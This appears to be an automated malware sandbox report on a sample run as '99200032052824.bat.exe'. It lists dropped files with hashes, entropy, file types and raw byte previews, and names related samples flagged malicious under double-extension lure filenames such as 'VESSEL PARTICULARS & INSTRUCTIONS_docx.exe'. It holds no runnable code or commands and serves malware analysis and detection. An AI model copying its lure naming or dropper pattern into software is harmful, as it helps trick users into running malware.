                          • Filename: VESSEL PARTICULARS & INSTRUCTIONS_docx.exe, Detection: malicious, Browse
                          • Filename: VESSEL PARTICULARS & INSTRUCTIONS_docx.exe, Detection: malicious, Browse
                          • Filename: 090100003400224.exe, Detection: malicious, Browse
                          • Filename: VESSEL PARTICULARS & INSTRUCTIONS_docx.exe, Detection: malicious, Browse
                          Reputation:moderate, very likely benign file
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L....~.\...........!..... ...........(.......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text...O........ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\Desktop\99200032052824.bat.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):25
                          Entropy (8bit):4.163856189774724
                          Encrypted:false
                          SSDEEP:3:+gMn:8
                          MD5:ECB33F100E1FCA0EB01B36757EF3CAC8
                          SHA1:61DC848DD725DB72746E332D040A032C726C9816
                          SHA-256:8734652A2A9E57B56D6CBD22FA9F305FC4691510606BCD2DFCA248D1BF9E79C7
                          SHA-512:D56951AC8D3EB88020E79F4581CB9282CA40FAA8ADC4D2F5B8864779E28E5229F5DFE13096CF4B373BBC9BC2AC4BFC58955D9420136FB13537F11C137D633C18
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:[Caps]..Setting=Enabled..
                          Process:C:\Users\user\Desktop\99200032052824.bat.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):4409
                          Entropy (8bit):4.998325107222196
                          Encrypted:false
                          SSDEEP:96:Z8NR23i27mHC6ldsqGicLJ4YmJjKMt6kG7MK/e4:ZuR23yCAcPajB6V7MKT
                          MD5:FE67CBDFC33E4BCA1D5DE148DFD4CCA7
                          SHA1:601B7664814ACEA408AA7BBB121D5BB26301DB57
                          SHA-256:67CEA0A0C921025E558737D5BB54EAD4D0E795AD3D9688A87D18C3531C9A9A10
                          SHA-512:E3B9871379906B4ACB92B71A67CD85BEC1DC490CB710E39335A34DCA7DC1DD9B05F80AC8A4201C6BCB115A76E3E439134745CB08D59F111F6FC44B6DCBFD06C7
                          Malicious:false
                          Reputation:low
                          Preview:.........p}...c..3.............4......4f..=P+.....t.........H........."..G.!7...8........eO..T......C.......2.^m..........~...#..w.............k4..7.............6.........T+.\+....................,.l...~..........._..,...G............".A..................C.Ai*......0...[...K....]...........1.........'....9.....W........\F...^..............p...v.d{.y.. ...<...|.6....P.....*........p..t8......4...!.*......@...f......S.........[.t.t.....@................Sm...K.....}...Z...;.D.b..;ph..7...."...............W.......7......K....-.....Vn..Q..h.......M.......B5..,m.d...t..W.N........./..w....%...V....G...5......~&+.....86....k..L..Q..... QcJp................g....-.B.....Q...............S..-.l.......@............d(./.....u...0U...}m........m.......u.....B<.....................<.g................X.j.......f..F.....p0.{..r........]......N...A.9m..*..........4=.s..........`E.&....t...........O.).R......J...................Ml.......9......|...................`.&h/.....&..2.-........L........
                          Process:C:\Users\user\Desktop\99200032052824.bat.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):2532
                          Entropy (8bit):4.9678315283199135
                          Encrypted:false
                          SSDEEP:48:ufsILXIGNP20GjA52PD7Iy6o7dX3bDUiRaGCi0yy2WoHBF5d:ufsI8GN+0sAoPDs7mX3PFRoVoHz
                          MD5:C6878D37B9258F8AF8406998E372374A
                          SHA1:0C98231F7395C3BADD802AF8B6F54759D042B778
                          SHA-256:D1437C6D99ED6EEF50164DC663DF24DF9E67783900A605B804EFB3728EEDCD69
                          SHA-512:B291DFCF1EEB22C04EDAF4B43AC1AE88B69AB1E4AED7AAA55EFAB1951B6F64BB395C8242874AF449C036AD1A2C63CB0364943C03F096FA20F4A1B3C571A846DC
                          Malicious:false
                          Preview:..........ED.....w....g....=>.70}..l....{h........................y..N....>.....j......f...b...u}.X^.@..W...@.....y..u.....Qs........$...9.....NO...m...[....Y...g...-.....s.}.......@..a.....Z...j.......R..........6.v.........]......_.........!.a........../.1.T......Z.........jg.<........;...............f..j........MM.\.7#..........".......yH........z...........)...S.z........3.[.....1h.}"3UZ...^...O..}...........)....o.........F....{.........G.....9.e.....M.6D....fm......K..g.C..g......e....~..............t......&....7..................._/.........o.r............7.........}h...8..............!t..".t..........h...z.)..?......Q...........................q......+.J...~..+.u..X..S.`........E.Yq%....g...6...........j....X....MO.........m...c...z6..W...Q.....|D..)......".............8..........#...t.7....c............"v................................_.\P........O...I.Y@.-.1L...m*F......q.h......{........QD.4..c....3.............K........9......>................&.k>
                          Process:C:\Users\user\Desktop\99200032052824.bat.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):267175
                          Entropy (8bit):7.5093466450966755
                          Encrypted:false
                          SSDEEP:6144:0bkpKe8XvlKE8doHmvveIqwPYxv9eh63gVua+orBWDar4pbq:0bkp2XkBZvvPqrl9MMgVuboVWDaiq
                          MD5:EFE533BAAD77375996164F3CA96F08C7
                          SHA1:61DAC0069B45D17CC6DAA70D1392A46A6CB22C55
                          SHA-256:518FF4DA0147E66D5D832FA038BFAD15017A7CC81F6986492737E520A3DD6999
                          SHA-512:6C02F5E7F336337DD621F0F2E95B984EB660E6F6DA8A5D0F238335D8875AA15ACC05D21796CEC2150D0122B442756B15963274D8A36A30F7793EFA97859EEB42
                          Malicious:false
                          Preview:....>........................1.1.......``........................#.CCCC.uuu.e............99.........tt....................LL...........55..........................].......................................................ffffffffffff...ii....:......###........... ......WWWW...............L.........................N........)).===.NN..............PPP.]].......E.g.........................a..........@@@@@...................---...8...33....................mmmmmm..SS.............jjj...CCC..YYY................................NNNNNNNN....dd...W...5.bbbb..............,......3...................##.G...............................................B.............SS...s................&&&&...........6........z......pp..f...s..```..... ...]]..............77....F...........b......---..AAAAA.............................K..))..........B.........gg...............................FFFF....%...%.{{...........qq.................ww..C.N..NN..........................3.aaa...........WW....:.yy.....x.........XX...
                          Process:C:\Users\user\Desktop\99200032052824.bat.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):3100
                          Entropy (8bit):4.748208227621493
                          Encrypted:false
                          SSDEEP:96:0+WozLtosUl81/8yuN9lvcoE5B9+crXOL:0+W0Pf1UysE/H9A
                          MD5:175C8E8CBBA4FEE420E7131DEFEE9C57
                          SHA1:ED7CA0AC22608E41CEBE91020026F4C7E30B5A42
                          SHA-256:DE842BB06394A7859D97C6188D1AFA217F10784A1F564EB3E0140C94FFC90048
                          SHA-512:7B88A23A4B8D767A33987478B64F73EC8DEF254042F1C3A12F0120A85DC6E072DCF641709FAA858AECD52425419FCD04B1D26AB06B18106ED436DDD7A93BEAE8
                          Malicious:false
                          Preview:......K.....X....~..........W..V........Z.........2O.V...../.................4.....I..G.!Y....-.e.......W.....6..........\`y...*.....(.`W........T.........p....?..o.d*^.......?A........^3h?x...... ..u......w........-.....#...B>.v.....6....n.\......L..Z...~P..................f.H./..........lw=.....6..........................|..h..zP...)p.....B.........C.......Y.M.........X.....P...].v{7...8a.....c.....CX.|J,..........O.}U\.K..ID.(..J..k.&..............$......e..F...w......S...%....9...g...1.....y&.*............@0/........?O.Q....s......................f.=.......................,.................}............l....|...!S....#...F..j.......k4>...R.Q.*=.........\)............+....$...............G..8....<....>...|?7.....'..............2...........s......n...O...;....]....;..8.l..!.5B@.............................{........C........d...............#.....l./....#.......-.4.WG......C...."[................#..........N.^..`..X.......]..W..{...3u.z..<..G....K........K.....!......C..
                          Process:C:\Users\user\Desktop\99200032052824.bat.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):7510
                          Entropy (8bit):4.91720718259004
                          Encrypted:false
                          SSDEEP:192:fpfdSEMUTMZjVLoPmnXD3/gCu1G5xa8sAiN4Ce:fNdSTUYz8Pm74Cgc48VtV
                          MD5:3C54B9521872A75B7FF9C08D5F58FC2C
                          SHA1:1C8A2A51E9A78B8E1F7E91B59A3AA4D9301095CB
                          SHA-256:7817A04E5EC98E43939698025A2133653F287290223320F237C12C1D3B6B126C
                          SHA-512:F121270D58F6F04BF57B6A86061CCACFACA783800A43DA56EDE010B22542DF9553C237445C4E86E8D812F090D2255CD1B6540B87B25543B6BFE2DAFAF413E0D3
                          Malicious:false
                          Preview:.,.......z.*....z..$........jK.J.w...._f...3.....<.m........!.............#..4.#..........c...40....u.~.wo......Y.......$e.()<..........................f..L...h..Q.......I.............q.J>....).....r._.el..........`....BU....1......mO....".9....I[U-.F.......[......H............Ye~...........6..............N.W....@...|.....i..........B.......<bu..a....XX....;...W........s....uI.(.}..-.....]..A...j........."...J........c.......X.....................+.............n.......?...........T.....E........2........$...............9.A3.....2..............\.].k.Z.8.......Y.;......!.............................F...?............................w.m.........o........>.h...........0Y............?. ...V...........w.........z.........`.....4..,...'.........z..........2..............V......i...D.....[....X....5..........}.E..........=.E...F..a1O...........A.+...........c....$. M.......................4X......z......j.P.)...g..............B..S../..G...6d.....0.{.....*.....#.......]....7..G....V..
                          Process:C:\Users\user\Desktop\99200032052824.bat.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):2501
                          Entropy (8bit):4.812074749205284
                          Encrypted:false
                          SSDEEP:48:YzKTprRUztTLPa86AEg32I6bSmPd30YDvSQLc3hePoE/eHv4d1w:bUu42NbBh0AaQJPIPuC
                          MD5:ED9E84934782D5FDC90AC9781DC9A6E1
                          SHA1:39DD2E37586C5CB5DD86A9F6A987C1FCDFF45FFF
                          SHA-256:37AD2DBD7F711971FD8DDD2BD78D5BDFEAACF52724FF9D7C7FC9B293F7C9B5FE
                          SHA-512:07FE7559008D6E528E8227BD64F305BA51EB739128067FCA911485F02F5A07B4531B6B5CD3D32A2CF02114CA27E64E0B32FCC1D813B55FE2EA00F33D0843D598
                          Malicious:false
                          Preview:*...C.....RI.......I....>f..........@.S.+...........#........f....1...2.b...c....$W.C...j....A.E...G......j....`...0.....K.............4......l%.2.....W....d.H..............W..p....x...3...j....N..W.........)...k.....B..0...h..8..P......\...P._...........6....u,$.......t..A.......n....2.p.......B.........O..|.:....$2......P.............p........i..............J..C....-.%.c....r..d...p.$.....~.......}H......e.X......>.!.D....7.n........c.E.....+.......{...;T..6...F..n...................h.g...\.....}........gV..x.M5......t.........C..ju...6.............1......-G..............l.....................fy.........l....$................O.z.r..w.......c...Y.........".sqj. ...........E.........^r..$.t^..........r.l......).......A9.............................V>x..6P..a.....Z...........x...6,..................(.o.......2.V.........q..D.D..........B.J.(......R..Z.f.....}.....c...F5F.......I.D....>..._M..`.........f.iL..............t.........-......}.............9...........!...........D..
                          Process:C:\Users\user\Desktop\99200032052824.bat.exe
                          File Type:TeX font metric data
                          Category:dropped
                          Size (bytes):2577
                          Entropy (8bit):5.07901334387277
                          Encrypted:false
                          SSDEEP:48:qFvj/6l92Aw0Xf3MtDM81l4U3d2pjLAFQKm12qEIVH4oqTVzj9lPj3UFhCNQ:wjGnw0fWD1l4UNYLXKBqbA/PjwhR
                          MD5:5FEC97594CEB46A5C143053B0A9FA6E2
                          SHA1:8B9C1B04B41BE3AE4E9D4909D873D7A3BC67272B
                          SHA-256:02F91F9E1D345BD7DAA518A98B5FD84B8DAE146633A6A8F3B15C0586D8C074DE
                          SHA-512:A3832EBBB5DB00C38FA4F60F9BA687499E4FCA6F5C036E4B7BD3C1F1039C0425B7B8B82D834B00E39557F40748DA5E725E6000C2A0BAD0701B11BCEDF96CF395
                          Malicious:false
                          Preview:.o...9T...z............K...xR`.....N........]+...............x....'.....T................(.........j....$.......>....!..........1y............i......a..../..r..d.n.......a....=>a.........j...;........U...,.....Q........P3..2.....xr..i`,............*..9........~.O....C...<.........9.......OW.....5..p./.x.D,...~.....}...........-....R.......)>...M.[...........*......o..."...%........r......_.Y....Og......v......................w+........r.........2..................q.............Z.N.....................q`.T(...j6....t....c/.......c...1.......M............aC.......C..0...."...J.B......=............Y,....+............K/.k+Q}.........}o...\e..w...R..."...l<..../..^.S2...V....?.......e.i........|.......a.A...V...............I........................H..J.._.........1..w.._.................)~.............U6..L..........M..J.8.9.h.4.....O.1o.....Ll...........Q..../.E=....z^.(..^0.....>.+....4.E.H.G.M...\.=......`....:...'.m..E...W....v..G"..z..........Sq...............8d...........
                          Process:C:\Users\user\Desktop\99200032052824.bat.exe
                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 200x200, components 3
                          Category:dropped
                          Size (bytes):23244
                          Entropy (8bit):7.540912926808858
                          Encrypted:false
                          SSDEEP:384:wZVE8byaUmJ0B1YWBWiU+y/KnPXLeO/4NK05cT8SLs3afUXiH43j:wbrbz6HYWBWiZy/KnP49cTbfUXr
                          MD5:18E048BA7596E10380F1AE242781B676
                          SHA1:AEA8403BFC4B42ADDC05F6098D5EE56E8BABC532
                          SHA-256:69881C64F796D9F2571116A8E6C3D9E1B77E6EB1A2CAFE6C9A333E6EE486B842
                          SHA-512:E5599C1F77C9DB3E027A2B38727F374E1746DD1281F42AC6397E478B9E4FCFC5A769AE8EA3F20333A409CBBCE28CE1C7869B44336D7E4EE4D5F41609C6EE30FE
                          Malicious:false
                          Preview:......JFIF.............C....................................................................C.........................................................................................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....?.3...?.Q...w.......5.."._............./.3L...g_..?....j.........O.>...4........0...9.......G.^............_....../.=L...V?.O.....S>g....%.W.......~.._.+...o..L....K.w.....4.x.....v...o...~Tz..I..$'........P....}._...P..~._./............n......g.e.....p.......o........_r.+.....U@.....|..............%...]_.w..JG....w......f...~R...E..g.X..P.9...D.C.........WW
                          Process:C:\Users\user\Desktop\99200032052824.bat.exe
                          File Type:ASCII text, with very long lines (364), with CRLF line terminators
                          Category:dropped
                          Size (bytes):443
                          Entropy (8bit):4.26226221852899
                          Encrypted:false
                          SSDEEP:12:QhhpvdH/VEZ66gB2tzWlnyEKXL2WMeZ9JDHoJt:QhhFxdEZG20lKJM09Not
                          MD5:052A3D0375E8EEB3A6A667ABFFC5F0EF
                          SHA1:761CA63CE01BAE7BD014F1CBF299E3432604B8AE
                          SHA-256:D4E94A18C627B29290276983B249D999F0F5DF0233A2D8CE187DC7978D70AA18
                          SHA-512:716B27E42775AC6A96BCA6ACE56D207362AEB8889DB4DC10160A3F37D6C313E52F67EB70D8201B288B34CAF0238FC332AB7DB9297E42818FA7E963697EEC0E43
                          Malicious:false
                          Preview:forklike carnaubas demythologising gdedes maranhao overgangsregeringen,skabhals avaradrano socialize dyssede rreddam resorufin.molybdn inogenic fyrsteder tachograph udsavende.skovsyrerne tilkendelsernes cerning,thenabouts fjerntrafikkernes squall beclamor profounder talomraadet driftskontrollers forsikringssummernes geometricise indeterminismes isopolite adsmith..derealization eforen unilluded nondisbursable rdstensmure blighties fadllers,
                          Process:C:\Users\user\Desktop\99200032052824.bat.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):3309
                          Entropy (8bit):4.898399826501928
                          Encrypted:false
                          SSDEEP:96:+f7M5oZ8Y0WrHmP+DwnfcXed5TAd6pivr:+TKS8Y024TccAd6pQ
                          MD5:1E5426FBAE44458D0B5526B99D0958CA
                          SHA1:E0934E69B42ABFDD6695ED678077725ECF0B5084
                          SHA-256:EA79B75BC89ADB3FAAFF4C957AFCD5CEEE4A40B88F22BBED3B045C659517B9A5
                          SHA-512:C63CD9C148ACBEFB50F49B6168C0BD2D01D2A62629ECA8DCDFFD05A269D6092871D2CA7DFA86C3629453B8791E63F90C4A61CF6EF8E6F47194F39BAF595A7B10
                          Malicious:false
                          Preview:.i......~cn.?...G........1h......."Y.........in..............b...}....K.7.............Og..{................g......r.O.........u.....a..:......W.A...l......&.....B.[...<..$.....A.........k...s.|...X...:..Y..S...3.I.. .m...b......k0..,[................(..............L;.....)..................t...Y...:... ......i..s...r...................c....=...].....Z...e..>....[......Q.H'................A.....J..m.s...q,.W.............&s.=.*..... .........!......t0.............L:.0..N...1......."..........Gm.......}......n............X3R....c..W...T.......4....7...'..`.....y:.......c...[..o,....6.T0...~/.....r...I.......`....`.t...........8.............7...z.............*.B.....Yr...7l.w.........`.....?...f....e....*..7.........9......b._............^...G}....G..@.m....Q.$..I........,.%.....d.....B.w......)......... ........................^...a....B..i....66.=.73...*...t.......r&.-......s..........F....h........]................2#....v...r$...............4.......T.....y... .x.....a.....a..M
                          Process:C:\Users\user\Desktop\99200032052824.bat.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):13465
                          Entropy (8bit):4.947258320601266
                          Encrypted:false
                          SSDEEP:192:ftl1uywODc/D4zuFLp+h9JqgH01ZFDwMVyDdb8m7wzLqb8IpcypMHKc4nqAtpGn:f/YvqWDt898gU1ZFDwMIIr94G
                          MD5:2AE1A3CDABC68B7F2AA156DC80A8BA6A
                          SHA1:E3065DB21D4CD531E715CB46B300FAC2A3AD2289
                          SHA-256:D5443C561171FDE4676C329F857AE86851BAD9755348EC79B9B54CDB60555BBE
                          SHA-512:03A1C5CD20A980A248ACF0EEAD25E0E77227F70082622BE4CB56B6F86FA3D366CB9567C4418CE2001A8534B57D77A27541F8C90BE56DE8C79E1762F4D1068BF2
                          Malicious:false
                          Preview:..........z..E..........w...W.2...]jD.......Ow.5......%........$..........$..o.....j.&..........`..Fuf...\.......l..e.w.:...(j....k.......q...........................U....%.....Z.T...........U..e..#%.........A...s.9......\.3....b.....E......t.... .........)...5.............}]...I..Q.......b........X:..S..[.......o.7...0...$........%...............c............l..........]...9.|.......G.................e7.........,..........H..o......H..n..`.4....S:...3Je............)..j.m~..p-......U.....&........Y..........Q'....!........I.}.H..q..-.r..iL..-....i......./.................!..$...R.b............5.......................*.0..@..X.>.................O......R.c..............M...........S......M...}.......A.5.........k.....M.\.................v...N............[.".B...M.....-............=..E......W...+......cE-yf..........>.5....T.................U..$\....D..*.........t......a.(.....U........................*..........e...X......q..f.............'........2<P.......:M.>...........
                          Process:C:\Users\user\Desktop\99200032052824.bat.exe
                          File Type:TTComp archive data, binary, 1K dictionary
                          Category:dropped
                          Size (bytes):7722
                          Entropy (8bit):4.85176842716064
                          Encrypted:false
                          SSDEEP:192:nZFPnCY2Hm36vHT+Tm7rsMnTRmGJ/w79zdpwIf6S:7fCLHm36PT+Tm7gMTbxwxdpxz
                          MD5:29907025DE7D88B9E24D525BCFCD0ACA
                          SHA1:992446AAE89264303D61432F16C934781A628EB1
                          SHA-256:2EE335FBD15E3E22CF0522BF4A7FA28E58C329E2B1691A01CD40DC4E18C7A4E3
                          SHA-512:29215F48A2F67FCE3B25AB7F6497A27DAC1E97EA35847830706FC073558E51775371BC9FCFDDFB760832E420FAE8DA2F106B2E62418DB2004EC400FBBF067A2E
                          Malicious:false
                          Preview:....l.....K..F..q5}...............................h....e..&{....U+....3.........u.0..e.....?.......q..........>..........nMh.;.....+BE..s.@.........B..........F......................C......+6.........|I.....o......=...........\.....s.......$...........Q...D..w....1.....9.A....>...k-...[.........._........;......=....p.0u..p..a[....*..).(.,.q.. ....................(..~y..a.3........As.................+.........Z...:.~.8...6.a..............mz......H.......%.....:....s^.......n..^....n2....b...W.V...........P........!...@\.k..>T.............*... @.....v....3....<.....`...X.....%..................P.....h....?....Q...Ux..........@q....../........4..........J.N.................w.......................r/.....................z^.......;..H......u....`.....e.........O.*N.#...v.........h.z.....4..+.h.E....X....~.........w............2...~..^.X.@......_....;............g.........qW.................y ......................<....n.s......!.....`....H..........(..L.......J......T.........
                          Process:C:\Users\user\Desktop\99200032052824.bat.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):3105
                          Entropy (8bit):4.917605198162765
                          Encrypted:false
                          SSDEEP:96:qPt4g9NwI1VI64tPI9331YoNn4szSJaIryd:I4gjv2r0yoUJ/yd
                          MD5:2820C0E9196BFB3569D0957C4D310813
                          SHA1:44B546C5A75241DECB0D419D509D86B0F83A228F
                          SHA-256:2DB6D4FE9932E4D1F9A3FCF304FB869EA176385B5BB24DF8FE1B64179D3A5F5E
                          SHA-512:57DF8A0782035D14DB6D29628FF210658A5395A31C614FB55EA1C93753FD9DCD07233BCD2264F8DC6522F90DCE28A852D6A4EB6A690D8B8BE11A11A22F9A9962
                          Malicious:false
                          Preview:.K_.^.......(.........{,....l.o.&...... ._..U..b.....u .G.{.......m.S....~._...4..n.......'.......i_..>........j(.e../.......H.@......N.........v...l......O........5.......O9........(./.p........lV.".fU...j........%.........x.....]....q......M......'.....+..7...$.........$.....b...~......9.....V..?.\..UV...............}....h9...C......Z.....@..7......\.....n.......Z................g..................W,..0.O...M=.......'........o.+.......d.......m........J.P.$............`...m.....r..,......../.<..........k........D`.......p...1..............e...4x........E...^...d....%..................S..s............f........Y..........y............k.........p.......w..........k..|.......:H..+I2.......)...I,...>....o..........{......~..R.?...^... .@...]......G...Ee...............]..a.........~........l........o...y..|....c.......`dl.......{................'....J!.......g....+.v....;....3.v..t.........w.(..T.......J.>o.n.............}..Y......a....Xz..i!.........a....j..3...........i?..........
                          Process:C:\Users\user\Desktop\99200032052824.bat.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):9978
                          Entropy (8bit):4.908627124521558
                          Encrypted:false
                          SSDEEP:192:lT1mzLGWI8BObOtq2V6JCGtsNigpgDjR1i8BxwYwu+p6:lTSI80bOgC6R7X+p6
                          MD5:D1AA27BE4695EFFDE130C89CA7BFBC62
                          SHA1:32CF0D7B76A74A29B94E3F05858E0DA7DFCC9F08
                          SHA-256:F209716D597B246F27998DA4749DB45AD61A645DE446E886463D18CB54DD187D
                          SHA-512:AA635DDF1F0F9A0DD7812B341C67624D193AA1BE7D0C2AA88AE64A2F51F1849323A3173EE6784D481BF91307FFF55CF66EF6271FB8CDBD901CA3000A1FAFFB71
                          Malicious:false
                          Preview:..;...........L...L.P.....h......Ur...B..i.....'hV..................}..dI..WN......kS...V.....................p..^C.X...?...d.....;.OU.K.............L`......}.".............................Q..........H......O.20Z................+....k..h........r...X.........................!.............u...Z.s.........'l...........z..Jn..Z..........n'.a.......~......:.........e.....a....../.....D........n.......Q.G.....j.......~...................h.......?R...........i..Py.L...............@.}....g...Y.1K(L.(..J..................}........6...........w...........r..}...$....E.@..c+.\...........Fn....].".n....M....C....Ta...f....=p..K;....U.4...x..[.'........3........._......t....T.8......i.+.q........Z...i......B...g....O....[..9.t.................b...b...d..j...+...e..M:...!....`...............y......K.........zR.........G....e?._.........................-J...a.......H....0........C......f...........h......h......(.o......%......E...............m.....Qh............................u..._8..U.....
                          Process:C:\Users\user\Desktop\99200032052824.bat.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):3350
                          Entropy (8bit):4.894453707611395
                          Encrypted:false
                          SSDEEP:48://vGRembfsNciS59pnhjSQZPbKDPiaI6hI2VmwLJ0z6G0mQuN4hZ:/wkNGdhjS2PbVAmwF0t0T
                          MD5:16AF1A5579221F98F7A49F0A9E521704
                          SHA1:B9C4E48C381998605EA86DCD99C4F116BF2D2790
                          SHA-256:FDB32CC85C39D7FA95FF9634B7AB406F1959C6388A60F0ED7877EC1A492D6EE3
                          SHA-512:4BF5749FFB3C367728610C3D9B8640E4A3663AACAB47C898C5C5E7DCDAB54C15E4368DF4819F2467D9E22D6716860E4F0F6DE12361F48BF8C1AFED35F2136ED9
                          Malicious:false
                          Preview:..'...c.k.......R...PW...D?.......5....I...F............*..;..`..).#..d.....PV....$5.i....R..z.....?...=^...6..~"=........$.....Gsa..Fx;.....;...).3.............4.......I.v..~s.&......D.3[.=.......K./.}....K..................l............]@o................E....`.....V.....,...C........-1..R...o.......^.*....h.....$..............f.."......C.vB.'...r.?.]........."...........o.....ss..[...b........s..m....:.R.J............)..s....pj.^O.......P$.k.r.........=.=.y".......%.1.(.{=....w...[......o.....q.......0.9......L..D.......................v........M..........<..9.......M.........I.g...Z9..q....K...........X.............U....s.M.m.*...G.....Z?..@...k....../....p..$...aJ.....d.....F....:..\. .5.........O.0.V.G........O.......X..4.....o...a...#.......v...........c8....a.........3.@...................(.......Z...........Y4.GJ.&.H..........A^....1.........`#.b...........8.............."..............$R..........w}...............C...f.{..u............{yN....w.....................
                          Process:C:\Users\user\Desktop\99200032052824.bat.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):13209
                          Entropy (8bit):4.958809693126459
                          Encrypted:false
                          SSDEEP:384:A0BxOjCRAKa0HAMddbG798fJhmTu1US21:7S4PahS8SJpKSo
                          MD5:A0EED22B474BBB911B0CBD28BDD4A543
                          SHA1:3810338ADD88F5AB3837AEB87AD0C8CD66C20AEC
                          SHA-256:02D407A9D84325C5A53D156AB1008A5A7DAEDBC6087C0BB21AED461976EE5EB6
                          SHA-512:EAD609280EDEC21AE14B2514D2356B1B39FE3760B2419E63172EAFA095DB900069EB8D5FA36D6BEBB7A81DD3796234794D90BC0EE742542C20AE18DEE211036F
                          Malicious:false
                          Preview:..........Y.....2.`...`....!..~.......>.@....~b.ic....|6.@..............m.........V.......|"..0......N8................N...{.hB...h~.(......S.B........`.......N.......................F....C...V2.........z.*.............L..........................N....%........CB........................;.r............S...........q.F.1.J..?.....|.Q......`...P.......a.z..2....b...]..D.....1D................h...q.........:.............NY....."..2..g....B.*.Cg......d....2n."....D.......C..M......(....F...&r.&................Z..........x.....a...;C..........U...........]#.T.C]..............M...........p.,..Q%.Z...9...m.np...H....4.e..=...........f.....%..............k.r.Q5i.e......m..|..&..D..0....u.*y.....R.P8.z...x..d...h....g................5mM.\........#Q".....z..2..^..........W....M....(................B3.../.q..t........)...U..6..................-jM...................+.*_.........D...........F....u./.p..................9........l#..h...T...N.\[..D...z.....J................m.....e:...N...P....
                          Process:C:\Users\user\Desktop\99200032052824.bat.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):1918
                          Entropy (8bit):4.866117324562928
                          Encrypted:false
                          SSDEEP:48:tcSw5sLkgw4mnWWIFDXB5yZknRnYSPv0w1s68BUmN:tcDSrgPWbB5vnRNPMys62Uq
                          MD5:F5FA64BA1796D441E9069D66EAC986C9
                          SHA1:D1A07F8E72F9DDEAB1CEA5AE64068C92483F9237
                          SHA-256:DCADA90E85DDF4B55AFA174DA586C17DBD970C76801A526FBBFC4C73C8619E17
                          SHA-512:0BB8BE2340B996061B92E7C004A301852208428961FFDCEC6909872B21E3C68D3672CEFC07231D6E05ED80A0395CA32381CF557043E76BBBD1DA1C78020AB89E
                          Malicious:false
                          Preview:.....H.74....j......J.........7....l..........N.4..........t.............s.kO...H.z..J.)b.....L......v.;.$......F..C.5.p:J...................q.....{....X.....-......;....`......{z...)...`..."...........8.....$..P...?.....................j.L..@......@........x..........F.............=......,..........s......r.j........W.x1......4............X...m..S..V..|.c.."...h.........q'......e.2....:..........j.....AB......A...\"..F........ .....>..v....T....o..%b.X.X....6..g)...'..F...o........ $X......9.0G... ..{..t...#p!P2....S....._..,n.X..........o.....s..3....H..|*....#.9..5...~...U......@p.........gL..o..<......*..XD.$.....D.f..U.....`...........M....%..%O..q...._.....K...}.............8...I....".t.............R..L.......9.......?....z.../.....k].Ne..o.6.....y..%.....R......j.....Dp.........#.d.1...V.......J..........W..3..5.I..........2.......u..................ME.......!......O.........).F...f..{..k....z.<,........P...e1.......i.....=*._.......,........'.d.........<...W......".
                          Process:C:\Users\user\Desktop\99200032052824.bat.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):14713
                          Entropy (8bit):4.934954013154932
                          Encrypted:false
                          SSDEEP:192:P15IKag1z48yfTvHm1GpudD2DrxwmUnagvnp4xzaM8QIbpU3NbiLghghkLm:NJX88yKQpuUa31fpfM8QHGgWv
                          MD5:4F98614616B284CB3F6BE2259A3BAA26
                          SHA1:C750B5F26D0663189B089D2FE799F085E533B90C
                          SHA-256:9E0410CA591D013A22A483F132A6B42E66D799953F4B4450AA42B02015B93CFA
                          SHA-512:C5FB64F244D4A41D35AA00F5991004F03C621264885ED9E4748799F7B7E15A8C1DDD2BFD32A75CAB8C350ACE2AD7C3CEB2BAEF375E2B660E8927F9D863CA2E7B
                          Malicious:false
                          Preview:......<.........../s......l..!..........X...A........)...i.......E...>....P........B................U.............................&..........A...E........'.......T....=.......E.........<}.F...................V........\....D.....R..........w..]^.o.G....>..........$...fp..@.......9.........k..$..........`..............+./.p.z6.........................M.)................................=......K.?.VGk...._.......>.......~..c....0..4.....9..........U....#.......".T......q..St.......Y....eZ................................<j........#...;.N.....d.......J....k:.'....{.........y........!u........!.............0r....1..8....u..R..iV....O......;.........I...1....d....G..".d.~?..................7...'.a....~..Dk.F.%........L.....j........9W...........=...l..-.<=...Z....!2.{..S..z.......?..m..................x..$.{....9...L............N.........8.G!.P..Y.........Y.......e.......KY..m.............].z......A.......n.o.........L.....&E.....U.........f.....+....e....h..|K.8.....Xd..........zL..
                          Process:C:\Users\user\Desktop\99200032052824.bat.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):16272
                          Entropy (8bit):4.562088205470639
                          Encrypted:false
                          SSDEEP:384:CUZhzCym6kuUq5PHVtiNLm4l5j+iWb4WCs9JDbGo4mt:9h+ymGn5PjiNplVDWLCwJZ42
                          MD5:BCD7E822363D8366F1EF6E6611BC2F3D
                          SHA1:9A0245A3BBC5635641745368A3AD683ECF00BBA3
                          SHA-256:062B935DB8D2D43C3A7B8C813E36F904C4FAFF8005D36F5005E7CA8040372D22
                          SHA-512:BB842534FBA2E80705BD7465CD00B7E43B2DAD8146A69D9A3D06F7558606CAA4197009837413D1794B0BA0CC08CE9E290DD43D8B9944DF0DBA535625EAA68227
                          Malicious:false
